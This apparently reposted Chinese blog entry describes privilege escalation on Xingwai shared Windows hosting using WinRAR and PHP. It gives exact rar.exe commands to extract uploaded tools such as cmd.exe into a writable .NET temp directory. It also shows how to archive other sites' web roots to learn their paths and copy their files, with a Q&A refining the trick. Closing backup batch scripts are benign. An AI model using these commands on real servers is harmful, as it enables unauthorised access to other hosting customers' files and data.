星外虚拟主机以前的0day,在虚拟主机提权时可以尝试一下:
一个是关于RAR的解压文件,一个是关于PHP。
cmd路径 c:\Program Files\winrar\rar
命令写:D:\freehost\zfduanxin\web\1.rar “C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\07a495e6\”
1.rar是工具的压缩包,比如里面有cmd.exe cscript.exe或者XX的,可以打包下去。然后利用rar命令解压。
\07a495e6这随便写的,一般有很多现成的,子目录都可以的
这样就工具解压到了C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\07a495e6\下面
RAR命令 C:\Program Files\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\cookies\xx.rar d:/freehost/xx/web/ cmd下回显示文件名
问题:
仅仅知道网站都在d:/freehost/目录下,目标站有个特定的文件1314we.jpg,但是不知道目标站完整的物理路径
这样的是否可行?
回答:
rar a -k -r -s -m1 d:\freehost\ceshi1314\wwwroot\ceshi.rar d:\freehost\1314we.jpg成功
虽然1314we.jpg并不是位于d:\freehost\1314we.jpg,而是位于d:\freehost\ceshi1315\wwwroot\image\1314we.jpg
这样就得到了一个仅仅包含1314we.jpg文件及上级目录的压缩包,
再依据该压缩包可以得到目标站无论路径是d:\freehost\ceshi1315\wwwroot
再次打包rar a -k -r -s -m1 d:\freehost\ceshi1314\wwwroot\ceshi.rar d:\freehost\ceshi1315\wwwroot\即可
还有一个是讨论php的,
1.远程调用CMD
2.利用rar列文件名
3.C:\php\php.exe
问题:
“C:\php\php.exe xx.php” php代码为读文件代码或者列目标目录代码,找了些类似代码都没成功,求利用成功1和3的朋友现身说法,谢谢
回答:
调用php和那个rar道理一样,都是说有账户有读取的权限,但是,asp,aspx,啥的组件被限制了,读不了,然后使用第三方的软件来读,理论上,我 们自己写个列目录的程序,丢上去,执行下一样能列,调用系统 API的方式)当然这样的可写可执行目录可能找不到,直接利用第三方发最好了。
ps:在虚拟主机中可以利用rar进行压缩的原因是系统安装winrar时选择了所有用户都可使用,而不是仅当前用户可以使用。
—————————————————————————————————————————————–
打包当前目录下所有子目录为rar压缩包并备份到指定位置!
- :Compress
- for /d %%d in (%1.\*.*) do “%ProgramFiles%.\WinRAR\rar” a -r -m0 -inul %1.\”%%~nxd.rar” “%%~nxd”
- for %%f in (%1.\*.*) do “%ProgramFiles%.\WinRAR\rar” a -r -m0 -inul %1.\”%%~nf.rar” “%%~nxf”
- del AutoBAK.rar
- md E:\AutoBAKUP\FreeHost\BakUP%date:~0,10%
- move E:\freehost\*.rar E:\AutoBAKUP\FreeHost\BakUP%date:~0,10%
打包整个MYSQL数据库目录到指定的位置备份!
- echo 开始备份本站MYSQL数据库!
- net stop MySQL5
- “C:\Program Files\WinRAR\Rar.exe” a -k -r -s -m1 -inul “E:\AutoBAKUP\SQLData\BakUp%date:~0,10%.rar” “C:\Program Files\MySQL\MySQL Server 5.0\data”
- net start MySQL5
- echo 数据库备份完成!
转载请注明:jinglingshu的博客 » rar在虚拟主机机提权的配合和思路